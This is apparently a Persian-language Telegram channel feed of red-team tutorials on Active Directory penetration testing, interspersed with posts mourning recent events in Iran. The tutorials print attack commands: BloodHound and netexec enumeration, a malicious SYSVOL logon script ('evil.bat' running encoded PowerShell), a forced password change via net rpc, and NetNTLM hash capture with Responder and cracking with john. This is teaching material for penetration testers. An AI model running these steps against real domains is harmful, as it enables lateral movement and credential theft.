کاربرد کامندهای شبکه لینوکس در عملیات Red Teaming(از کتاب Red Team Guide) هر کامند زیر رو با تمرکز بر کاربرد عملی در فازهای استاندارد MITRE ATT&CK توضیح دادم. این توضیحات کمک میکنن بفهمید هر ابزار چطور توی عملیات واقعی تست نفوذ کمک میکنه.
کامندها بر اساس کتاب
توضیحات: تحلیل شخصی + تجربهٔ عملیاتی
مطالعه در توییتر
کامندها بر اساس کتاب
توضیحات: تحلیل شخصی + تجربهٔ عملیاتی
مطالعه در توییتر
👍8❤2
تست نفوذ Active Directory - بخش اول
اکتیودایرکتوری (AD) یک سرویس دایرکتوری است که توسط مایکروسافت برای شبکههای دامینی ویندوز توسعه داده شده است.
شناسایی (Enumeration)
کشف Domain Controllerها
شمارش یا enum با BloodHound
1. اجرای BloodHound
ما از BloodHound Community Edition استفاده میکنیم.
دستور زیر Docker Compose مربوط به BloodHound را اجرا میکند:
بعد از اجرا، رابط وب از طریق مرورگر و آدرس زیر در دسترس است:
با نام کاربری admin و پسوردی که هنگام اجرای دستور در لاگ نمایش داده میشود لاگین کنید.
برای مشخص کردن IP و پورت دلخواه، متغیرهای محیطی زیر را روی ماشین اتک تنظیم کنید:
ادامه دارد ...
#AD
@KavehOffSec
اکتیودایرکتوری (AD) یک سرویس دایرکتوری است که توسط مایکروسافت برای شبکههای دامینی ویندوز توسعه داده شده است.
شناسایی (Enumeration)
کشف Domain Controllerها
dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25
شمارش یا enum با BloodHound
1. اجرای BloodHound
ما از BloodHound Community Edition استفاده میکنیم.
دستور زیر Docker Compose مربوط به BloodHound را اجرا میکند:
curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # اگر میخواهید پسورد BloodHound را ریست کنید
sudo docker-compose pull && sudo docker-compose up
بعد از اجرا، رابط وب از طریق مرورگر و آدرس زیر در دسترس است:
http://localhost:8080
با نام کاربری admin و پسوردی که هنگام اجرای دستور در لاگ نمایش داده میشود لاگین کنید.
برای مشخص کردن IP و پورت دلخواه، متغیرهای محیطی زیر را روی ماشین اتک تنظیم کنید:
export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090
ادامه دارد ...
#AD
@KavehOffSec
GitHub
GitHub - SpecterOps/BloodHound: Six Degrees of Domain Admin
Six Degrees of Domain Admin. Contribute to SpecterOps/BloodHound development by creating an account on GitHub.
❤6👍2
🔥 در مناسبت شب چله، یا همانطور که در دوره ساسانی به آن گفته میشد «زایش مِهر»، به یاد ایزد مِهر، که خود پیمان مقدس است، که تابش خورشیدی است که انسان را به فرّ و خورشید، به وسپار اورمزد، و تمامی مردمان خوب را به هم متصل میکند، باشد که خجسته باشی، چله خجسته باد!
🔥 جشن شب چله، شب گردهمایی خانوادگی و دور هم بودن و شادمانی خویشاوندان و شاهنامه خوانی و فال حافظ گرفتن، فرخنده باد
🔥 جشن شب چله، شب گردهمایی خانوادگی و دور هم بودن و شادمانی خویشاوندان و شاهنامه خوانی و فال حافظ گرفتن، فرخنده باد
❤9
تست نفوذ Active Directory - بخش دوم
جمعآوری دادهها
گزینه ۱: استفاده از NetExec
اگر از قبل NetExec روی سیستم شما نصب است، به نظر من این سادهترین راه است.
گزینه ۲: استفاده از BloodHound.py
همچنین میتوانیم از BloodHound.py استفاده کنیم.
آن را به شکل زیر نصب کنید:
سپس دادهها را جمعآوری کنید:
#AD
@KavehOffSec
جمعآوری دادهها
گزینه ۱: استفاده از NetExec
اگر از قبل NetExec روی سیستم شما نصب است، به نظر من این سادهترین راه است.
netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All
گزینه ۲: استفاده از BloodHound.py
همچنین میتوانیم از BloodHound.py استفاده کنیم.
آن را به شکل زیر نصب کنید:
python3 -m venv .venv
source .venv/bin/activate
pipx install bloodhound # یا بهجای 'pipx' از 'pip3' استفاده کنید
bloodhound-python -h
سپس دادهها را جمعآوری کنید:
# -d: دامنه (Domain)
# -u: نام کاربری (Username)
# -p: رمز عبور (Password)
# -dc: دامین کنترلر (Domain Controller)
# -c all: جمعآوری تمام دادهها
# -ns: تعیین nameserver جایگزین
bloodhound-python -d example.local -u username -p password -dc dc.example.local -c all -ns ns.example.local
#اگر نتوانستیم دامنه را resolve کنیم، میتوانیم از dnschef برای ساخت یک DNS جعلی بهصورت پراکسی استفاده کنیم:
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
#AD
@KavehOffSec
GitHub
GitHub - iphelix/dnschef: DNSChef - DNS proxy for Penetration Testers and Malware Analysts
DNSChef - DNS proxy for Penetration Testers and Malware Analysts - iphelix/dnschef
❤2
تست نفوذ Active Directory - بخش سوم
آپلود دادههای جمعآوریشده
پس از اجرا، فایلهای نتیجه با پسوند (*.json) در دایرکتوری فعلی تولید میشوند. تمام این فایلهای JSON را در BloodHound داخل مرورگر وب آپلود کنید.
میتوانیم روابط موجود در Active Directory را بررسی کنیم.
بررسی Investigation
سوءاستفاده از اسکریپت لاگین برای کاربران دیگر
اگر کاربر فعلی مجوز نوشتن اسکریپتها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت لاگین سایر کاربران را تغییر دهیم.
وقتی کاربر دیگر وارد سیستم شود (Log on)، فایل .bat اجرا خواهد شد.
Force Change Password Attack
اگر به نام کاربری/رمز عبور یک حساب دسترسی پیدا کنیم و نام کاربری حسابهای دیگر را هم بدانیم، ممکن است بتوانیم رمز عبور کاربران دیگر را تغییر دهیم. برای انجام این کار، کاربر باید مجوز GenericAll را برای تغییر رمز عبور سایر کاربران داشته باشد.
توضیح پارامترها:
این دستور رمز عبور کاربر تارگت را با استفاده از دسترسی کاربری که مجوز لازم را دارد، بهصورت اجباری تغییر میدهد.
Microsoft Management Console (mmc)
برای راهاندازی و پیکربندی Active Directory، مراحل زیر را دنبال کنید:
#AD
@KavehOffSec
آپلود دادههای جمعآوریشده
پس از اجرا، فایلهای نتیجه با پسوند (*.json) در دایرکتوری فعلی تولید میشوند. تمام این فایلهای JSON را در BloodHound داخل مرورگر وب آپلود کنید.
میتوانیم روابط موجود در Active Directory را بررسی کنیم.
بررسی Investigation
# فهرست تمام کاربران
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A
# فهرست تمام گروهها
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com
# نمایش سیاست رمز عبور
net accounts /domain
# لیست Object Active Directory
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com
# دریافت اطلاعات مربوط به دامنه مشخصشده
Get-ADDomain -Server dc.example.com
# تغییر رمز عبور کاربر Active Directory
Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL - یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره میکند.
dir \\dc.example.com\SYSVOL\
سوءاستفاده از اسکریپت لاگین برای کاربران دیگر
اگر کاربر فعلی مجوز نوشتن اسکریپتها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت لاگین سایر کاربران را تغییر دهیم.
# 1. Check the permission
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\
# 2. Modify/Add a malicious script
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat
# 3. Set logon script for the specified user
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat
وقتی کاربر دیگر وارد سیستم شود (Log on)، فایل .bat اجرا خواهد شد.
Force Change Password Attack
اگر به نام کاربری/رمز عبور یک حساب دسترسی پیدا کنیم و نام کاربری حسابهای دیگر را هم بدانیم، ممکن است بتوانیم رمز عبور کاربران دیگر را تغییر دهیم. برای انجام این کار، کاربر باید مجوز GenericAll را برای تغییر رمز عبور سایر کاربران داشته باشد.
توضیح پارامترها:
-U:
اعتبارنامه کاربری که مجوز تغییر رمز عبور کاربر دیگر را دارد
-I:
آدرس IP تارگت
-S:
نام سرور تارگت
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"
این دستور رمز عبور کاربر تارگت را با استفاده از دسترسی کاربری که مجوز لازم را دارد، بهصورت اجباری تغییر میدهد.
Microsoft Management Console (mmc)
برای راهاندازی و پیکربندی Active Directory، مراحل زیر را دنبال کنید:
روی آیکون ویندوز راستکلیک کنید.
روی Run کلیک کرده و عبارت mmc را وارد کنید، سپس OK را بزنید.
در پنجره MMC، روی File → Add or Remove Snap-ins کلیک کنید.
هر سه Snap-in مربوط به Active Directory را اضافه کنید.
در پنل سمت چپ، روی Active Directory… راستکلیک کرده و گزینه Change Forest را انتخاب کنید.
نام دامنه را بهعنوان Root domain وارد کرده و روی OK کلیک کنید.
از منوی بالا روی View → Advanced Features کلیک کنید.
#AD
@KavehOffSec
❤5
الگوی نامگذاری (Naming Convention) - بخش پایانی
اگر فهرستی از نامهای کاربری را در Active Directory پیدا کنیم، میتوانیم با استفاده از الگوی نامگذاری، نامهای کاربری احتمالی را حدس بزنیم.
برای مثال:
ورود SSH با اعتبارنامههای Active Directory
تزریق اعتبارنامهها به حافظه (Inject Credentials into Memory)
پیکربندی DNS
اکنون بررسی کنید که تنظیمات بهدرستی اعمال شده باشند:
دانش پایه
مدیریت کاربران (User Management)
برای مثال، اگر بخواهید رمز عبور کاربر john را ریست کنید، دستور زیر را در PowerShell اجرا کنید و سپس رمز عبور جدید را در پنجره درخواستشده وارد نمایید:
اولین باری که John پس از این تغییر وارد سیستم میشود، میخواهیم مجبور شود رمز عبور دلخواه خودش را (نه رمزی که شما تعیین کردهاید) تنظیم کند. برای این کار دستور زیر را اجرا کنید:
اکنون زمانی که John وارد سیستم شود، از او خواسته میشود رمز عبور جدیدی انتخاب کند.
رهگیری احراز هویت NetNTLM (Intercept NetNTLM Authentication)
ابزار Responder را اجرا کنید تا به درخواستهای LLMNR، NBT-NS و WPAD گوش دهد.
خب Responder را در حال اجرا نگه دارید تا زمانی که درخواستهایی دریافت شود.
اگر هش NTLM دریافت کردید، آن را روی سیستم محلی کرک کنید.
#AD
@KavehOffSec
اگر فهرستی از نامهای کاربری را در Active Directory پیدا کنیم، میتوانیم با استفاده از الگوی نامگذاری، نامهای کاربری احتمالی را حدس بزنیم.
برای مثال:
john smith -> jsmith, j.smith, john.smith
michael pole -> mpole, m.pole, michael.pole
ورود SSH با اعتبارنامههای Active Directory
ssh dc.example.com\\<ad_username>@sub.dc.example.com
تزریق اعتبارنامهها به حافظه (Inject Credentials into Memory)
# /netonly: تمام ارتباطات شبکهای از این اعتبارنامههای تزریقشده برای احراز هویت استفاده میکنند.
runas.exe /netonly /user:<domain>\<username> cmd.exe
پیکربندی DNS
PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
اکنون بررسی کنید که تنظیمات بهدرستی اعمال شده باشند:
nslookup dc.example.com
دانش پایه
مدیریت کاربران (User Management)
تفویض اختیار (Delegation)
در Active Directory، مدیر سیستم میتواند بدون اعطای دسترسیهای کامل مدیریتی، مدیریت کاربران را در یک Organizational Unit (OU) به کاربر دیگری واگذار کند.
راهاندازی
ابزار Active Directory Users and Computers را باز کنید.
روی OU موردنظر راستکلیک کرده و گزینه Delegate Control… را انتخاب کنید.
در پنجره بازشده، نام کاربری را که میخواهید اختیار مدیریت به او واگذار شود وارد کنید.
وظایفی را که کاربر Delegationشده مجاز به انجام آنهاست انتخاب کنید.
روی OK کلیک کنید.
مدیریت کاربران (Manage Users)
با کاربر Delegation شده وارد سیستم شوید.
برای مثال، اگر بخواهید رمز عبور کاربر john را ریست کنید، دستور زیر را در PowerShell اجرا کنید و سپس رمز عبور جدید را در پنجره درخواستشده وارد نمایید:
Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
اولین باری که John پس از این تغییر وارد سیستم میشود، میخواهیم مجبور شود رمز عبور دلخواه خودش را (نه رمزی که شما تعیین کردهاید) تنظیم کند. برای این کار دستور زیر را اجرا کنید:
Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
اکنون زمانی که John وارد سیستم شود، از او خواسته میشود رمز عبور جدیدی انتخاب کند.
رهگیری احراز هویت NetNTLM (Intercept NetNTLM Authentication)
ابزار Responder را اجرا کنید تا به درخواستهای LLMNR، NBT-NS و WPAD گوش دهد.
sudo responder -I <interface-like-eth0>
خب Responder را در حال اجرا نگه دارید تا زمانی که درخواستهایی دریافت شود.
اگر هش NTLM دریافت کردید، آن را روی سیستم محلی کرک کنید.
echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt
#AD
@KavehOffSec
❤4
دوباره برگشتیم به فضای مجازی ولی با کلی غم... امیدوارم حال دلتون خوب باشه هرچند که می دونیم چی به سرمون اومد. این چند روزه اونقدر تلخ گذشت که خودش یه کتابه؛ کتابی که هر صفحهاش فقط اشک و غصه است. تسلیت میگم به همه ی هموطنای عزیزم که این مدت داغ دیدن و سیاهپوش شدن 🖤🥀
❤10
Forwarded from Try Hack Box
🖤 با عرض تسلیت مجدد به تمامی خانوادههای داغدار ایران، امیدوارم ما را در این داغ شریک بدانید. 🥀
⚫️ درود ! امیدوارم که حال همهمان هرچند در این لحظه دشوار، به تدریج بهتر شود.
وضعیت اینترنت همانطور که میدانید، ناپایدار است و آیندهاش نیز نامشخص به نظر میرسد. در این شرایط، ما با دلی اندوهگین تصمیم داریم بر روی محتوا تمرکز کنیم تا بتوانیم کمی از این فضای غمانگیز فاصله بگیریم و از فروپاشی روحی جلوگیری کنیم. با اینکه در این مدت تمایل چندانی به فعالیت نداشتم، اما معتقدم که انسانیت و احترام به یاد عزیزانی که دیگر در میان ما نیستند، از هر تخصصی مهمتر است.🕊
امروز که سی روز از فقدان این عزیزان است، بر خود لازم میدانیم که فعالیتهای خود را آغاز کنیم. با وجود اینکه بسیاری از افراد هنوز نتوانستهاند به اینترنت متصل شوند، ما به یاد کسانی که دیگر در کنار ما نیستند، از ایموجی های 🥀 🖤 🕊 استفاده خواهیم کرد و از شما نیز دعوت میکنیم در مطالب خود از این ایموجی ها بهره ببرید و در ریکشن ها در کانال از 🕊 استفاده کنید .
به امید روزی که دیگر شاهد چنین حوادث تلخی در کشور عزیزمان ایران نباشیم و بتوانیم با همدلی و همبستگی، آیندهای روشنتر بسازیم.🥀🖤🕊
با احترام و همدردی 🖤🥀🕊
از طرف مجموعه TryHackBox
⚫️ درود ! امیدوارم که حال همهمان هرچند در این لحظه دشوار، به تدریج بهتر شود.
وضعیت اینترنت همانطور که میدانید، ناپایدار است و آیندهاش نیز نامشخص به نظر میرسد. در این شرایط، ما با دلی اندوهگین تصمیم داریم بر روی محتوا تمرکز کنیم تا بتوانیم کمی از این فضای غمانگیز فاصله بگیریم و از فروپاشی روحی جلوگیری کنیم. با اینکه در این مدت تمایل چندانی به فعالیت نداشتم، اما معتقدم که انسانیت و احترام به یاد عزیزانی که دیگر در میان ما نیستند، از هر تخصصی مهمتر است.🕊
امروز که سی روز از فقدان این عزیزان است، بر خود لازم میدانیم که فعالیتهای خود را آغاز کنیم. با وجود اینکه بسیاری از افراد هنوز نتوانستهاند به اینترنت متصل شوند، ما به یاد کسانی که دیگر در کنار ما نیستند، از ایموجی های 🥀 🖤 🕊 استفاده خواهیم کرد و از شما نیز دعوت میکنیم در مطالب خود از این ایموجی ها بهره ببرید و در ریکشن ها در کانال از 🕊 استفاده کنید .
به امید روزی که دیگر شاهد چنین حوادث تلخی در کشور عزیزمان ایران نباشیم و بتوانیم با همدلی و همبستگی، آیندهای روشنتر بسازیم.🥀🖤🕊
🥀 جهان یادگار است و ما رفتنی
🥀به گیتی نماند به جز مردمی
با احترام و همدردی 🖤🥀🕊
از طرف مجموعه TryHackBox
❤3🍾1
دوستان یسری رشته توییت مفید راجب ردتیم میزنم توییتر داشته باشید :
https://www.x.com/kavehxnet
https://www.x.com/kavehxnet
X (formerly Twitter)
kaveh (@KavehxNet) on X
Red Teamer | #HackingIsNotACrime Advocate
👍2
AD-Kerberos-SSH-SSO-TryHackBox.pdf
822.3 KB
🔖 موضوع : SSH با Kerberos در Active Directory فراموش کنید کلید و رمز عبور فقط با تیکت Kerberos وارد شوید
@KavehOffSec
#REDTEAM #ردتیم #AD
این روش SSH با Kerberos (GSSAPI) یکی از تمیزترین و مخفی ترین راههایی هست که تو عملیات Red Team استفاده میکنیم. دیگه لازم نیست key بذاری رو سرور، دیگه لازم نیست رمز بزنی، فقط کافیه تیکت Kerberos داشته باشی.
@KavehOffSec
#REDTEAM #ردتیم #AD
❤4🔥1
فاز اول Red Team قسمت دوم : منابع اوسینت و ابزارهای Recon و Relationship و ...
https://x.com/i/status/2022396326059839992
https://x.com/i/status/2022396326059839992
X (formerly Twitter)
kaveh (@KavehxNet) on X
فاز اول Red Team قسمت دوم : منابع اوسینت و ابزارهای Recon و Relationship و گوگل دورک ها برای استفاده در اوسینت .
در recon، قدیمیترین ابزارها اغلب مرگبارترین ضربه را میزنند.
#RedTeam #OSINT
در recon، قدیمیترین ابزارها اغلب مرگبارترین ضربه را میزنند.
#RedTeam #OSINT
❤7
دستور زیر در Windows PowerShell برای گرفتن گزارش از تنظیمات Group Policy (GPO) استفاده میشود:
این دستور یک گزارش از سیاستهای اعمالشدهی Group Policy (مجموعه نهایی سیاستها یا RSoP) تولید میکند و آن را به صورت فایل HTML در مسیر زیر ذخیره میکند:
توضیح بخشهای دستور:
دریافت مجموعه نهایی سیاستهای اعمالشده روی کاربر یا کامپیوتر
نوع گزارش را به صورت فایل HTML مشخص میکند
مسیر ذخیره فایل گزارش را تعیین میکند
این گزارش به این شکل نمایش داده میشود: در عکس پایین :
@KavehOffSec
Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\thb\Desktop\r.html
این دستور یک گزارش از سیاستهای اعمالشدهی Group Policy (مجموعه نهایی سیاستها یا RSoP) تولید میکند و آن را به صورت فایل HTML در مسیر زیر ذخیره میکند:
C:\Users\thb\Desktop\r.html
توضیح بخشهای دستور:
Get-GPResultantSetOfPolicy
دریافت مجموعه نهایی سیاستهای اعمالشده روی کاربر یا کامپیوتر
-ReportType Html
نوع گزارش را به صورت فایل HTML مشخص میکند
-Path
مسیر ذخیره فایل گزارش را تعیین میکند
این گزارش به این شکل نمایش داده میشود: در عکس پایین :
@KavehOffSec
🔥4
چو رنگین رخ تاجور تیره شد
بهزاریش بهرامِ یل خیره شد
چهل روز بُد سوگوار و نژند
پُر از گرد و بیکار تختِ بلند
چهل روز گذشت....🥀🕊
مرا اندرین سوگ یاری کنید
همان تن به تن سوگواری کنید
نبیند سرِ تیغِ ما را نیام
نه هرگز بُوَم زین سپس شادکام
ز مردمْشُمَـر گر ز دام و دده
کسی کو نباشد به درد آزَده
مباد اندر آن دیدهدر آبِ شرم
که از دردِ ما نیست پر خونِ گر
به یاد تمام کسانی که دیگر نیستند 🕊🥀🖤
🕊4🤩1
شمارش Active Directory با ADModule.pdf
2.5 MB
🔖 شمارش اکتیو دایرکتوری با ADModule
🥀🖤🕊
@KavehOffSec
#AD
#ردتیم
⭕ اکتیو دایرکتوری Active Directory به مدیران شبکه این امکان رو میده که دامنهها، کاربران و تمام ابجکت های داخل شبکه رو به راحتی مدیریت کنن.
⭕ هر چی شبکه بزرگتر میشه، AD راه هوشمندانهای برای سازماندهی صدها و هزاران کاربر فراهم میکنه: اونها رو داخل گروه ها و زیرگروههای منطقی قرار میده و دقیقاً در هر سطح، کنترل دسترسی رو اعمال میکنه.
🥀🖤🕊
@KavehOffSec
#AD
#ردتیم
❤🔥6
AD Enumeration w SC - @TryHackBox.pdf
755.8 KB
🔖 در عملیات تیم قرمز، اغلب با پیادهسازی های داخلی VDI روبرو میشویم که دسترسی به اینترنت و شبکه خارجی ندارند، و به همین دلیل نمیتوانیم اسکریپت های PowerShell خود را برای شمارش AD و کاربران آن در سیستم های آسیبدیده دانلود کنیم.
در این آموزش، به بررسی این دستورات تک خطی میپردازیم که میتوانند به ما در شمارش AD کمک کنند.
توییتر بنده : https://www.x.com/kavehxnet
🥀🕊🖤
@KavehOffSec
#ردتیم
در بیشتر دوره های تیم قرمز، دانشجویان را تشویق می کنند تا از اسکریپت های PowerShell آماده برای شمارش محیط AD استفاده کنند، مانند powerview.ps1، که روشی بسیار مناسب و غیرپیچیده است. اما اگر این روش مناسب برای ما نامناسب شود و اجازه دانلود اسکریپتهای PowerShell یا هر ابزار دیگری از اینترنت در سیستم آسیبدیده را نداشته باشیم، چه باید کرد؟
اسکریپتهایی مانند Powerview.ps1 از توابع برای سادهسازی کارها استفاده میکنند. اما برخی از دستورات تک خطی وجود دارند که می توانند همان کار را در صورت عدم دسترسی به powerview انجام دهند.
در این آموزش، به بررسی این دستورات تک خطی میپردازیم که میتوانند به ما در شمارش AD کمک کنند.
توییتر بنده : https://www.x.com/kavehxnet
🥀🕊🖤
@KavehOffSec
#ردتیم
🕊5❤2🔥1